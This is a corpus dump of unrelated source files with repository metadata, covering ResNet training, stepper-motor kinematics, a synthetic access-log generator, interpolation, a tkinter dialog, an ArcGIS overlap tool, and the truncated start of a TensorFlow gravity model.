residual = keras.layers.ReLU()(residual)
residual = keras.layers.Conv2D(128, 3, strides=1, padding='same', activation=None, use_bias=False)(residual)
residual = keras.layers.BatchNormalization(axis=-1, momentum=TRAINING_BN_MOMENTUM, epsilon=TRAINING_BN_EPSILON, center=True, scale=True)(residual)
residual = keras.layers.ReLU()(residual)
residual = keras.layers.Conv2D(512, 1, strides=1, padding='same', activation=None, use_bias=False)(residual)
x = keras.layers.Add()([x, residual])
# encoder - level 2 - standard bottleneck complete
# input
# tensor: 7 x 7 x 512
# main path
# batch norm
# ReLU
# output
# tensor: 7 x 7 x 512
x = keras.layers.BatchNormalization(axis=-1, momentum=TRAINING_BN_MOMENTUM, epsilon=TRAINING_BN_EPSILON, center=True, scale=True)(x)
x = keras.layers.ReLU()(x)
# encoder - output
encoder_output = x
# decoder
y = keras.layers.GlobalAveragePooling2D()(encoder_output)
decoder_output = keras.layers.Dense(num_classes, activation='softmax')(y)
# forward path
model = keras.Model(inputs=model_input, outputs=decoder_output, name='resnetv2_model')
# loss, backward path (implicit) and weight update
model.compile(optimizer=tf.keras.optimizers.Adam(lr_initial), loss='sparse_categorical_crossentropy', metrics=['accuracy'])
# return model
return model
# create and compile model
model = create_model(DATA_CROP_ROWS, DATA_CROP_COLS, DATA_CHANNELS, MODEL_LEVEL_0_BLOCKS, MODEL_LEVEL_1_BLOCKS, MODEL_LEVEL_2_BLOCKS, DATA_NUM_CLASSES, TRAINING_LR_MAX)
# model description and figure
model.summary()
keras.utils.plot_model(model, 'cifar_model.png', show_shapes=True)
################################################################################
#
# TRAIN AND VALIDATE
#
################################################################################
# learning rate schedule
def lr_schedule(epoch):
# staircase
# lr = TRAINING_LR_MAX*math.pow(TRAINING_LR_SCALE, math.floor(epoch/TRAINING_LR_EPOCHS))
# linear warmup followed by cosine decay
if epoch < TRAINING_LR_INIT_EPOCHS:
lr = (TRAINING_LR_MAX - TRAINING_LR_INIT)*(float(epoch)/TRAINING_LR_INIT_EPOCHS) + TRAINING_LR_INIT
else:
lr = (TRAINING_LR_MAX - TRAINING_LR_FINAL)*max(0.0, math.cos(((float(epoch) - TRAINING_LR_INIT_EPOCHS)/(TRAINING_LR_FINAL_EPOCHS - 1.0))*(math.pi/2.0))) + TRAINING_LR_FINAL
# debug - learning rate display
# print(epoch)
# print(lr)
return lr
# plot training accuracy and loss curves
def plot_training_curves(history):
# training and validation data accuracy
acc = history.history['accuracy']
val_acc = history.history['val_accuracy']
# training and validation data loss
loss = history.history['loss']
val_loss = history.history['val_loss']
# plot accuracy
plt.figure(figsize=(8, 8))
plt.subplot(2, 1, 1)
plt.plot(acc, label='Training Accuracy')
plt.plot(val_acc, label='Validation Accuracy')
plt.legend(loc='lower right')
plt.ylabel('Accuracy')
plt.ylim([min(plt.ylim()), 1])
plt.title('Training and Validation Accuracy')
# plot loss
plt.subplot(2, 1, 2)
plt.plot(loss, label='Training Loss')
plt.plot(val_loss, label='Validation Loss')
plt.legend(loc='upper right')
plt.ylabel('Cross Entropy')
plt.ylim([0, 2.0])
plt.title('Training and Validation Loss')
plt.xlabel('epoch')
plt.show()
# callbacks (learning rate schedule, model checkpointing during training)
callbacks = [keras.callbacks.LearningRateScheduler(lr_schedule),
keras.callbacks.ModelCheckpoint(filepath=SAVE_MODEL_PATH+'model_{epoch}.h5', save_best_only=True, monitor='val_loss', verbose=1)]
# training
initial_epoch_num = 0
history = model.fit(x=dataset_train, epochs=TRAINING_NUM_EPOCHS, verbose=1, callbacks=callbacks, validation_data=dataset_test, initial_epoch=initial_epoch_num)
# example of restarting training after a crash from the last saved checkpoint
# model = create_model(MODEL_LEVEL_0_REPEATS, MODEL_LEVEL_1_REPEATS, MODEL_LEVEL_2_REPEATS)
# model.load_weights(SAVE_MODEL_PATH+'model_X.h5') # replace X with the last saved checkpoint number
# initial_epoch_num = X # replace X with the last saved checkpoint number
# history = model.fit(x=dataset_train, epochs=TRAINING_NUM_EPOCHS, verbose=1, callbacks=callbacks, validation_data=dataset_test, initial_epoch=initial_epoch_num)
# plot accuracy and loss curves
plot_training_curves(history)
################################################################################
#
# TEST
#
################################################################################
# test
test_loss, test_accuracy = model.evaluate(x=dataset_test)
print('Test loss: ', test_loss)
print('Test accuracy: ', test_accuracy)
# example of saving and loading the model in Keras H5 format
# this saves both the model and the weights
# model.save('./save/model/model.h5')
# new_model = keras.models.load_model('./save/model/model.h5')
# predictions = model.predict(x=dataset_test)
# new_predictions = new_model.predict(x=dataset_test)
# np.testing.assert_allclose(predictions, new_predictions, atol=1e-6)
# example of saving and loading the model in TensorFlow SavedModel format
# this saves both the model and the weights
# keras.experimental.export_saved_model(model, './save/model/')
# new_model = keras.experimental.load_from_saved_model('./save/model/')
# predictions = model.predict(x=dataset_test)
# new_predictions = new_model.predict(x=dataset_test)
# np.testing.assert_allclose(predictions, new_predictions, atol=1e-6)
# example of getting a list of all feature maps
# feature_map_list = [layer.output for layer in model.layers]
# print(feature_map_list)
# example of creating a model encoder
# replace X with the layer number of the encoder output
# model_encoder = keras.Model(inputs=model.input, outputs=model.layers[X].output)
# model_encoder.summary()
################################################################################
#
# DISPLAY
#
################################################################################
# extract a batch from the testing dataset
# then extract images and labels for this batch
dataset_display = dataset_test.take(1)
it = iter(dataset_display)
display_images, display_labels = next(it)
# predict pmf and labels for this dataset
predict_labels_pmf = model.predict(x=dataset_display)
predict_labels = np.argmax(predict_labels_pmf, axis=1)
# for display normalize images to [0, 1]
display_images = ((display_images*DATA_STD_DEV.reshape((1, 1, 1, 3))) + DATA_MEAN.reshape((1, 1, 1, 3)))/255.0;
# cycle through the images in the batch
for image_index in range(predict_labels.size):
# display the predicted label, actual label and image
print('Predicted label: {0:1d} and actual label: {1:1d}'.format(predict_labels[image_index], display_labels[image_index]))
plt.imshow(display_images[image_index, :, :, :])
plt.show()
| [
"[email protected]"
]
| |
06e0a0b0461ac2a9d3ce0c4a8a28f8a13dbfd295 | bbf82010b3dab5ba35331d15166750818bf22b37 | /experiment_1.py | 70a1cb22e4e88318831113a5ff0c125ad123d8e0 | []
| no_license | seregichevks/Diploma-Instacart-Market-Basket-Analysis | 889d068fd5be1c48c3fcbc7d7e58af1b771d58b9 | 3771add03e2d488df8fb8fdb19a9785be7bfc7cd | refs/heads/master | 2023-07-05T07:46:34.480429 | 2021-08-24T04:57:02 | 2021-08-24T04:57:02 | 399,338,596 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 42 | py | print('Hello world')
print('Hello world')
| [
"[email protected]"
]
| |
5430ad132d8586b098a6dbb7f055a06b6339da62 | e1db880dc68e16b6947cc6920643245ae37a7cdd | /Kinematics/Forward_and_Inverse_kinematic.py | 187e10f8e6fefc64613f3d5a05bb2568be1964c6 | []
| no_license | zhezhou1993/Germian_Spp2 | 872ceddd7c8e60a452c23dd5b940e693b2dc5223 | 22c269c3368cc60a8ed0fde5a20d036231d0c337 | refs/heads/master | 2020-12-07T15:38:43.352777 | 2015-12-15T05:43:14 | 2015-12-15T05:43:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,655 | py | __author__ = 'germain'
'''The code is developed to control the stepper motor for SPP2 project IK testing'''
#Import severl libraries
from ctypes import *
import sys
from time import sleep
#Phidget specific imports
from Phidgets.PhidgetException import PhidgetErrorCodes, PhidgetException
from Phidgets.Events.Events import AttachEventArgs, DetachEventArgs, ErrorEventArgs, InputChangeEventArgs, CurrentChangeEventArgs, StepperPositionChangeEventArgs, VelocityChangeEventArgs
from Phidgets.Devices.Stepper import Stepper
from Phidgets.Phidget import PhidgetLogLevel
from kinematics import *
from stepper_motor_setup import *
import math
#Define several important factors about the two stepper motors
STEPPER_1_CIRCLE = 16457
STEPPER_2_CIRCLE = 85970
h2 = 1550.0
r1 = 30.0
r2 = 35.0
try:
stepper = Stepper()
#Create a new device object
stepper_1 = Stepper()
except RuntimeError as e:
print("Runtime Exception:%s"% e.details)
print("Exiting....")
exit(1)
#Information Display Function
def DisplayDeviceInfo():
print("|------------|----------------------------------|--------------|------------|")
print("|- Attached -|- Type -|- Serial No. -|- Version -|")
print("|------------|----------------------------------|--------------|------------|")
print("|- %8s -|- %30s -|- %10d -|- %8d -|" % (stepper.isAttached(), stepper.getDeviceName(), stepper.getSerialNum(), stepper.getDeviceVersion()))
print("|------------|----------------------------------|--------------|------------|")
print("Number of Motors: %i" % (stepper.getMotorCount()))
#Event Handler Callback Functions
def StepperAttached(e):
attached = e.device
print("Stepper %i Attached!" % (attached.getSerialNum()))
def StepperDetached(e):
detached = e.device
print("Stepper %i Detached!" % (detached.getSerialNum()))
def StepperError(e):
try:
source = e.device
print("Stepper %i: Phidget Error %i: %s" % (source.getSerialNum(), e.eCode, e.description))
except PhidgetException as e:
print("Phidget Exception %i: %s" % (e.code, e.details))
# def StepperCurrentChanged(e):
# source = e.device
# print("Stepper %i: Motor %i -- Current Draw: %6f" % (source.getSerialNum(), e.index, e.current))
#
# def StepperInputChanged(e):
# source = e.device
# print("Stepper %i: Input %i -- State: %s" % (source.getSerialNum(), e.index, e.state))
#
# def StepperPositionChanged(e):
# source = e.device
# print("Stepper %i: Motor %i -- Position: %f" % (source.getSerialNum(), e.index, e.position))
#
# def StepperVelocityChanged(e):
# source = e.device
# print("Stepper %i: Motor %i -- Velocity: %f" % (source.getSerialNum(), e.index, e.velocity))
#Control the stepper motors by converting angels to steps
def step2angel(step,motor_index):
if motor_index == 1:
fraction = float(step)/STEPPER_1_CIRCLE
degree = 360*fraction
return degree
else:
fraction = float(step)/STEPPER_2_CIRCLE
degree = 360*fraction
return degree
def angel2step(angel,motor_index):
if motor_index == 1:
step = int(angel/0.35*16)
return step
else:
step = int(angel/0.067*16)
return step
#Main Program Code
try:
#logging example, uncomment to generate a log file
#stepper.enableLogging(PhidgetLogLevel.PHIDGET_LOG_VERBOSE, "phidgetlog.log")
stepper.setOnAttachHandler(StepperAttached)
stepper.setOnDetachHandler(StepperDetached)
stepper.setOnErrorhandler(StepperError)
#stepper.setOnCurrentChangeHandler(StepperCurrentChanged)yt
# stepper.setOnInputChangeHandler(StepperInputChanged)
# stepper.setOnPositionChangeHandler(StepperPositionChanged)
# stepper.setOnVelocityChangeHandler(StepperVelocityChanged)
#do the samething for stepper_1
stepper_1.setOnAttachHandler(StepperAttached)
stepper_1.setOnDetachHandler(StepperDetached)
stepper_1.setOnErrorhandler(StepperError)
#stepper_1.setOnCurrentChangeHandler(StepperCurrentChanged)
# stepper_1.setOnInputChangeHandler(StepperInputChanged)
# stepper_1.setOnPositionChangeHandler(StepperPositionChanged)
# stepper_1.setOnVelocityChangeHandler(StepperVelocityChanged)
except PhidgetException as e:
print("Phidget Exception %i: %s" % (e.code, e.details))
print("Exiting....")
exit(1)
print("Opening phidget object....")
try:
stepper.openPhidget(serial = 398177)
stepper_1.openPhidget(serial = 398175)
except PhidgetException as e:
print("Phidget Exception %i: %s" % (e.code, e.details))
print("Exiting....")
exit(1)
print("Waiting for attach....")
try:
stepper.waitForAttach(10000)
stepper_1.waitForAttach(10000)
except PhidgetException as e:
print("Phidget Exception %i: %s" % (e.code, e.details))
try:
stepper.closePhidget()
stepper_1.closePhidget()
except PhidgetException as e:
print("Phidget Exception %i: %s" % (e.code, e.details))
print("Exiting....")
exit(1)
print("Exiting....")
exit(1)
else:
DisplayDeviceInfo()
#Here We start our code to move the motor as we expected
try:
#set up the zero position
stepper.setCurrentPosition(0,0)
stepper_1.setCurrentPosition(0,0)
#Start the stepper motors
stepper.setEngaged(0,True)
stepper_1.setEngaged(0,True)
#Set up the speed, acceleration,and current
setup_limit(stepper,0,1645*10,1.5,1645*10)#speed normally 4000
setup_limit(stepper_1,0,8597*10,1.0,8597*10)
sleep(2)
try:
#report where they are
print ("the current position for motor 1 is %lf"% (step2angel(stepper.getCurrentPosition(0),1)))
print ("the current position for motor 2 is %lf"% (step2angel(stepper_1.getCurrentPosition(0),2)))
while(True):
model = raw_input("Please choose model, 1 for FK, 2 for IK, 3 for back to initial position, 4 for exit")
if model == "1":
target_degree_theta1= float(raw_input("Please enter the degree of bottom motor:"))
target_degree_theta2= float(raw_input("Please enter the degree of upper motor:"))
if target_degree_theta2 <= 0:
print "Warnning! Cannot caululate FK"
elif target_degree_theta1 > 0:
target_position_stepper = angel2step(target_degree_theta1,1)
target_position_stepper_1 = angel2step(target_degree_theta2,2)
stepper.setTargetPosition(0,target_position_stepper)
stepper_1.setTargetPosition(0,-1*target_position_stepper_1)
target_degree_theta1 = math.radians(float(target_degree_theta1))
target_degree_theta2 = math.radians(float(target_degree_theta2))
b = (h2 + r2*math.cos(target_degree_theta2))/math.tan(target_degree_theta2)+r2*math.sin(target_degree_theta2)+r1*math.tan(target_degree_theta1)
FK_X = r1/math.cos(target_degree_theta1)-b*math.sin(target_degree_theta1)
FK_Y = b*math.cos(target_degree_theta1)
print("real_world_codinate: (%lf,%lf)"%(FK_X,FK_Y))
elif target_degree_theta1 < 0:
target_position_stepper = angel2step(target_degree_theta1,1)
target_position_stepper_1 = angel2step(target_degree_theta2,2)
stepper.setTargetPosition(0,target_position_stepper)
stepper_1.setTargetPosition(0,-1*target_position_stepper_1)
target_degree_theta1 = math.radians(float(target_degree_theta1))
target_degree_theta2 = math.radians(float(target_degree_theta2))
b = (h2 + r2*math.cos(target_degree_theta2))/math.tan(target_degree_theta2)+r2*math.sin(target_degree_theta2)+r1/math.tan(-1*target_degree_theta1)
FK_X = b*math.sin(-1.0*target_degree_theta1)
FK_Y = b*math.cos(-1.0*target_degree_theta1)-r1/math.sin(-1.0*target_degree_theta1)
print("real_world_codinate: (%lf,%lf)"%(FK_X,FK_Y))
elif target_degree_theta1 == 0:
target_position_stepper = angel2step(target_degree_theta1,1)
target_position_stepper_1 = angel2step(target_degree_theta2,2)
stepper.setTargetPosition(0,target_position_stepper)
stepper_1.setTargetPosition(0,-1*target_position_stepper_1)
target_degree_theta1 = math.radians(float(target_degree_theta1))
target_degree_theta2 = math.radians(float(target_degree_theta2))
FK_X = r1
FK_Y = (h2 + r2*math.cos(target_degree_theta2))/math.tan(target_degree_theta2)+r2*math.sin(target_degree_theta2)
print("real_world_codinate: (%lf,%lf)"%(FK_X,FK_Y))
else:
pass
elif model == "2":
target_real_world_x = float(raw_input("Please enter the real world X:"))
target_real_world_y = float(raw_input("Please enter the real world Y:"))
if target_real_world_y < 0:
print "not reachable"
target_degree_theta1 = 0
target_degree_theta2 = 0
elif target_real_world_x > r1:
target_degree_theta1 = -1.0*math.degrees(math.acos(r1/math.sqrt(target_real_world_x**2+target_real_world_y**2))-math.atan(abs(target_real_world_y)/abs(target_real_world_x)))
target_degree_theta2 = (90.0-math.degrees(math.pi/2.0-math.atan(h2/math.sqrt(target_real_world_x**2+target_real_world_y**2-r1**2))-math.atan(r2/math.sqrt(target_real_world_x**2+target_real_world_y**2-r1**2+h2**2))))
else:
target_degree_theta1 = math.degrees(math.pi-math.acos(r1/math.sqrt(target_real_world_x**2+target_real_world_y**2))-math.atan(abs(target_real_world_y)/abs(target_real_world_x)))
target_degree_theta2 = math.degrees(math.pi-math.atan(math.sqrt(target_real_world_x**2+target_real_world_y**2-r1**2)/h2)-math.acos(r2/math.sqrt(target_real_world_x**2+target_real_world_y**2-r1**2+h2**2)))
print target_degree_theta1,target_degree_theta2
target_position_stepper = angel2step(float(target_degree_theta1),1)
target_position_stepper_1 = angel2step(float(target_degree_theta2),2)
stepper.setTargetPosition(0,target_position_stepper)
stepper_1.setTargetPosition(0,-1*target_position_stepper_1)
elif model == "3":
stepper.setTargetPosition(0,0)
stepper_1.setTargetPosition(0,0)
elif model == "4":
break
else:
print "ERROR INPUT"
while (stepper.getCurrentPosition(0) != stepper.getTargetPosition(0)):
pass
while (stepper_1.getCurrentPosition(0) != stepper_1.getTargetPosition(0)):
pass
sleep(1)
# print ("the current position for motor 1 is %lf"% (stepper.getCurrentPosition(0)))
# print ("the current position for motor 2 is %lf"% (stepper_1.getCurrentPosition(0)))
except KeyboardInterrupt:
pass
print("down")
stepper.setEngaged(0,False)
stepper_1.setEngaged(0,False)
sleep(1)
stepper.closePhidget()
stepper_1.closePhidget()
except PhidgetException as e:
print("Phidget Exception %i: %s" % (e.code, e.details))
print("Exiting....")
exit(1)
exit(0)
| [
"[email protected]"
]
| |
d56af36783dc15d48fb3fb5238e7be00ed6cda35 | ca76a15c1ecdeb848683bc3b58e849f08a639b8b | /src/main/scala/com/ww/sparksql/statproject/datasource/GenNetAccessLog.py | c5d9e3d08533fb4dd4cac13046179474e607e25b | []
| no_license | l838224553/Spark | b8bd422f5fa9f0554fdba6646b8ca8659ce0600c | 45046eec63c04062590e5e03cdfffb6ed968d8ef | refs/heads/master | 2022-07-22T09:14:30.984045 | 2020-05-14T08:34:23 | 2020-05-14T08:34:23 | 261,978,226 | 0 | 0 | null | 2020-05-07T11:14:24 | 2020-05-07T07:18:22 | null | UTF-8 | Python | false | false | 2,840 | py | #!/usr/bin/python
# -*- coding: UTF-8 -*-
import random
from random import randint
import time
__author__ = "wwcom123"
# 【数据流--1】:数据源
# 为后面统计结果观察验证方便,只生成某个月,某几天的数据
month = ["DEC"]
day = list(range(24, 27, 1))
hour = list(range(10, 24, 1))
minute_second = list(range(10, 60, 1))
# 4位IPV4地址范围
ip_slices = list(range(2, 254, 1))
http_method = ["POST" ,"GET"]
# 模拟
url_path = [
"video/1001",
"video/1002",
"video/1003",
"video/1004",
"video/1005",
"video/1006",
"audio/1001",
"audio/1002",
"book/1001",
"book/1002",
"book/1003"
]
# 模拟返回HTTP状态码
http_status = ["200", "404", "500"]
# 模拟访问流量
traffic = list(range(2000, 8000, 1))
# join() 方法用于将序列中的元素以.join()左侧指定的字符连接生成一个新的字符串
#随机生成访问源IP
def sample_ip():
ip_slice_sample4 = random.sample(ip_slices, 4)
return ".".join(str(x) for x in ip_slice_sample4)
#模拟随机生成 [11/DEC/2018:03:04:05 +0800]格式的时间日志
def sample_time():
min_sec = random.sample(minute_second,2)
min_sec_join = str(":".join(str(x) for x in min_sec))
hour_join = str(random.sample(hour, 1)[0])
day_join = str(random.sample(day ,1)[0])
month_join = random.sample(month ,1)[0]
return "[" + day_join + "/" + month_join + "/2018 " + hour_join + ":" + min_sec_join + " +0800]"
#模拟消耗流量字节数,放回采样
def sample_traffic():
return str(random.sample(traffic,1)[0])
# sample:从序列a中随机抽取n个元素,并将n个元素生以list形式返回
#随机生成用户访问的URL
def sample_url():
return random.sample(url_path, 1)[0]
# 模拟生成用户访问网址URL记录字段
def sample_url_click():
return "\"http://www.videonet.com/"+sample_url()+"\""
#模拟随机生成HTTP状态码,放回采样
def sample_status():
return random.sample(http_status, 1)[0]
#模拟生成"POST video/006 HTTP1.0"这3个字段的日志
def sample_method_url_status():
return "\""+ random.sample(http_method, 1)[0] + "\t" + sample_url() + "\tHTTP1.0\""
# 随机生成日志记录,数量可配置,不输入入参,默认生成10条
def genNetAccesslog(count = 10, path="OriginalData.txt"):
f = open(path, "w+")
while count >= 1:
query_log = "{ip}\t-\t-\t{local_time}\t{method_url_status}\t{http_status}\t{traffic}\t{url_click}".format(ip=sample_ip(),local_time=sample_time(),method_url_status=sample_method_url_status(),http_status=sample_status(),traffic=sample_traffic(),url_click=sample_url_click())
print(query_log)
f.write(query_log+"\n")
count = count - 1
f.close()
if __name__ == '__main__':
genNetAccesslog(1000)
# print(sample_time()) | [
"[email protected]"
]
| |
e1532be4269f8b27ab7e841cbb3e5b0bc6319f50 | 3fe4fad8082c8102d0700c95375248e5a08d83b7 | /venv/Scripts/easy_install-script.py | 6369f54400da4bdf1782e963bd194216674f451f | []
| no_license | marvelmagnum/lehavre | 8c1cba6a640aa018af8071a446b5ec780c809480 | 9bbbf0c0d253e29aabdb179ddbda917cb23f44a2 | refs/heads/master | 2021-06-14T12:12:17.816414 | 2021-02-24T23:01:01 | 2021-02-24T23:01:01 | 154,767,698 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 451 | py | #!"D:\Projects\PyCharm Projects\Le Havre\venv\Scripts\python.exe"
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==39.1.0','console_scripts','easy_install'
__requires__ = 'setuptools==39.1.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==39.1.0', 'console_scripts', 'easy_install')()
)
| [
"[email protected]"
]
| |
db9a51144909d05cfba1634f7a1f9dcf311d3051 | 574d762df232da167fead513b45ef5a60c2de76c | /OperationsA/MyFunctions/Interpolations/newt.py | 98a112b40cc844281f4205f03558358c18bac887 | []
| no_license | yogabbagabb/PythonProjects | e703012952327b15e304756e07640b09a4480054 | 8bc1af491bd63fff78906efe1e8e65d4bbcc8ac1 | refs/heads/master | 2021-01-10T01:10:07.730718 | 2017-02-09T14:05:36 | 2017-02-09T14:05:36 | 45,813,242 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 809 | py | '''
Created on Jan 20, 2016
@author: ahanagrawal
'''
'''
A two dimensional interpolation scheme that uses newton's divided difference
approach
The one dimensional matrix passed should contain all evaluations of
f(x) for all x of interest
'''
def makeCoefficients(a, x):
length = len(a)
for k in range(1, length):
for i in range(k, length):
a[i] = (a[i] - a[k-1])/(x[i] - x[k-1])
def returnPol(x, func, xD, y = None):
if y == None:
a = [func(x[i]) for i in range (len(x))]
else:
a = y.copy()
makeCoefficients(a, x)
polDegree = len(x) - 1
p = a[polDegree]
for i in range (1, len(x)):
p = a[polDegree - i] + (xD - x[polDegree - i])*p
return p
if __name__ == '__main__':
pass | [
"[email protected]"
]
| |
fd95d5fbefacb5b37e09b549986f43d521ae44a2 | 21fec19cb8f74885cf8b59e7b07d1cd659735f6c | /chapter_8/dlg-custom.py | b1338fb1bb4b149b6737cc31b65a691d7ecc67ba | [
"MIT"
]
| permissive | bimri/programming_python | ec77e875b9393179fdfb6cbc792b3babbdf7efbe | ba52ccd18b9b4e6c5387bf4032f381ae816b5e77 | refs/heads/master | 2023-09-02T12:21:11.898011 | 2021-10-26T22:32:34 | 2021-10-26T22:32:34 | 394,783,307 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,298 | py | "Custom Dialogs"
'''
Custom dialogs support arbitrary interfaces, but they are also the most complicated to
program. Even so, there’s not much to it—simply create a pop-up window as a
Toplevel with attached widgets, and arrange a callback handler to fetch user inputs
entered in the dialog (if any) and to destroy the window.
'''
import sys
from tkinter import *
makemodal = (len(sys.argv) > 1)
def dialog():
win = Toplevel() # make a new window
Label(win, text='Hard drive reformatted!').pack() # add a few widgets
Button(win, text='OK', command=win.destroy).pack() # set destroy callback
if makemodal:
win.focus_set() # take over input focus,
win.grab_set() # disable other windows while I'm open,
win.wait_window # and wait here until win destroyed
print('dialog exit') # else returns right away
root = Tk()
Button(root, text='popup', command=dialog).pack()
root.mainloop()
'''
Because dialogs are nonmodal in this mode, the
root window remains active after a dialog is popped up. In fact, nonmodal dialogs never
block other windows, so you can keep pressing the root’s button to generate as many
copies of the pop-up window as will fit on your screen.
'''
| [
"[email protected]"
]
| |
004458cf3c40d7c96286fba9e9405e34a77ca100 | 94a3acf9fd3ab4406787929d6266076191534455 | /Exams/Midterm/Midterm Submission/Question1.py | c5ef6b123609d265e2a5216543729f9c9b777928 | []
| no_license | brandon-rowe/Python | fec4c3fec2fb9a6b37ead3db9fc2a3c3173be194 | c405cefc02a25db4d3fdf3643383a47097a3e5ea | refs/heads/master | 2023-05-25T16:32:46.829690 | 2023-04-06T01:49:23 | 2023-04-06T01:49:23 | 171,032,591 | 0 | 2 | null | 2023-05-23T04:12:39 | 2019-02-16T17:42:59 | HTML | UTF-8 | Python | false | false | 459 | py | # Change Counter
def main():
_change = int(input("Please enter an amount between 0-99: "))
_quarters = _change//25
_change = _change%25
_dimes = _change//10
_change = _change%10
_nickels = _change//5
_change = _change%5
_pennies = _change//1
print(_quarters,": Quarters")
print(_dimes,": Dimes")
print(_nickels,": Nickels")
print(_pennies,": Pennies")
main()
| [
"[email protected]"
]
| |
965030f98fd33df2b8b068d3b56296d7ed67e5ce | 4fe81fa43d484334fd4045ab854c60935d423c07 | /auth/resources/list_all_users.py | d4aacec33dad4640ab1434ad7c84c076e3fb9cfb | []
| no_license | krish9191/Auth_process | 7fdf5bf2504f2cb8bbd6266f3d542e2f3206a711 | cf35e49b6e43f8ac13e487aad3df795ee1ccb89b | refs/heads/master | 2023-06-30T03:15:28.962742 | 2021-08-08T09:10:25 | 2021-08-08T09:10:25 | 361,009,473 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 220 | py | from auth.manager import list_users
from flask_restful import Resource
from decorators import admin_required
class UsersList(Resource):
@classmethod
@admin_required
def get(cls):
return list_users() | [
"[email protected]"
]
| |
bf15a0134c6b3e379d9901b3901eb79bfb8cefa4 | acb8e84e3b9c987fcab341f799f41d5a5ec4d587 | /langs/9/xm5.py | 38c66cb97e0801b2ac4684ce92a27b4b9fd0b4e8 | []
| no_license | G4te-Keep3r/HowdyHackers | 46bfad63eafe5ac515da363e1c75fa6f4b9bca32 | fb6d391aaecb60ab5c4650d4ae2ddd599fd85db2 | refs/heads/master | 2020-08-01T12:08:10.782018 | 2016-11-13T20:45:50 | 2016-11-13T20:45:50 | 73,624,224 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | import sys
def printFunction(lineRemaining):
if lineRemaining[0] == '"' and lineRemaining[-1] == '"':
if len(lineRemaining) > 2:
#data to print
lineRemaining = lineRemaining[1:-1]
print ' '.join(lineRemaining)
else:
print
def main(fileName):
with open(fileName) as f:
for line in f:
data = line.split()
if data[0] == 'xm5':
printFunction(data[1:])
else:
print 'ERROR'
return
if __name__ == '__main__':
main(sys.argv[1]) | [
"[email protected]"
]
| |
a07d58182c489431e554b84e7aaaa15160ba50a2 | ba2599d5106039c546d818dd1c11ec05213edf39 | /booleanoverlap.py | 1508bfe2be685474b20313fbdddcb06c0efc7692 | []
| no_license | eliza-wallace/ArcGIS_Tools | 3a96576a56cb94829f4a88bf8eb435fa915534b0 | 4f4d99752793de047ff1111fa83ef59c6fde297c | refs/heads/master | 2021-04-15T03:44:45.392693 | 2017-06-21T19:57:02 | 2017-06-21T19:57:02 | 94,559,161 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,697 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Jun 20 16:26:57 2017
Boolean Overlap Tool
@author: Eliza Wallace, [email protected]
"""
import arcpy
import sys
points = arcpy.GetParameterAsText(0)
polygons = arcpy.GetParameterAsText(1)
newfield = arcpy.GetParameterAsText(2)
# function that adds a suffix to a field name if it already exists
def AutoName(raster):
raster = raster.replace(' ','') # removes spaces from layer name for ESRI GRID format
checkraster = arcpy.Exists(raster) # checks to see if the raster already exists
count = 2
newname = raster
while checkraster == True: # if the raster already exists, adds a suffix to the end and checks again
newname = raster + str(count)
count += 1
checkraster = arcpy.Exists(newname)
return newname
# function that adds a short integer to a point feature class, then shows whether or not
#it overlaps a polygon in another feature class.
def booleanoverlap(points, polygons, newfield):
#copy polygons to new feature class
#polycopy = "polygonscopy"
polycopy = AutoName("polygonscopy")
arcpy.CopyFeatures_management(polygons,polycopy)
arcpy.AddField_management(polycopy,newfield,"SHORT")
arcpy.CalculateField_management(polycopy,newfield,"1","PYTHON")
joindata = AutoName("joindata")
arcpy.SpatialJoin_analysis(points, polycopy, joindata)
arcpy.JoinField_management(points, "OBJECTID", joindata, "OBJECTID", newfield)
arcpy.Delete_management(joindata, polycopy)
try:
booleanoverlap(points, polygons, newfield)
except Exception:
e = sys.exc_info()[1]
print(e.args[0])
arcpy.AddError(e.args[0])
| [
"[email protected]"
]
| |
d06381214dffd354dcc274beac64acf7506eacb1 | 5cdac410e331d90aba43cb84f6c2e5df27e45067 | /20191024_01.py | 5925477a286ab0c96bf0274f7e156166944a04b2 | []
| no_license | IngvarRed/circle_python_2019 | 2aef1c4a48636eda74dd66ff53434a3aa2ba615d | 4056536dee250a961ef6c4b18564c3088c5e990c | refs/heads/master | 2020-08-05T16:53:54.660536 | 2020-01-10T00:01:51 | 2020-01-10T00:01:51 | 212,623,059 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 173 | py | # 2d index
matrix = []
for i in range(5):
matriy = []
for j in range(5):
matriy.append(i + j)
matrix.append(matriy)
print(matrix)
print(matrix[2][4])
| [
"[email protected]"
]
| |
7987d0828fe16ad0f74645f891bb153c87757932 | 685b6ca5665fd052c02afebdbfab726de5be2c73 | /models/TFSingleOrigin.py | 3c8fe2b322ff75cb7e555b7c0e5ef4705227fca5 | [
"MIT"
]
| permissive | maptube/UMaaS | f37c50128fd2bb21a4dd563316aa7e255adcc04b | 0758d8352213f332546d728f3eb02411c16c97ac | refs/heads/master | 2021-10-12T17:16:46.266806 | 2021-10-08T15:58:29 | 2021-10-08T15:58:29 | 158,449,744 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,234 | py | import tensorflow as tf
#import numpy as np
from math import exp, fabs
import time
"""
Tensorflow implementation of single destination constrained gravity model
How about PyTorch or Keras?
"""
class TFSingleOrigin:
###############################################################################
def __init__(self,N):
self.N=N #7201 #number of zones - needed to be preset for the TF code (i.e. before matrix was loaded to give us N) - TODO: use TF adaptive sizes
self.numModes=3
self.TObs=[] #Data input to model list of NDArray
self.Cij=[] #cost matrix for zones in TObs
self.isUsingConstraints = False
self.constraints = [] #1 or 0 to indicate constraints for zones matching TObs - this applies to all modes
self.TPred=[] #this is the output
self.B=[] #this is the constraints output vector - this applies to all modes
self.Beta=[] #Beta values for three modes - this is also output
#create a graph for TensorFlow to calculate the CBar value
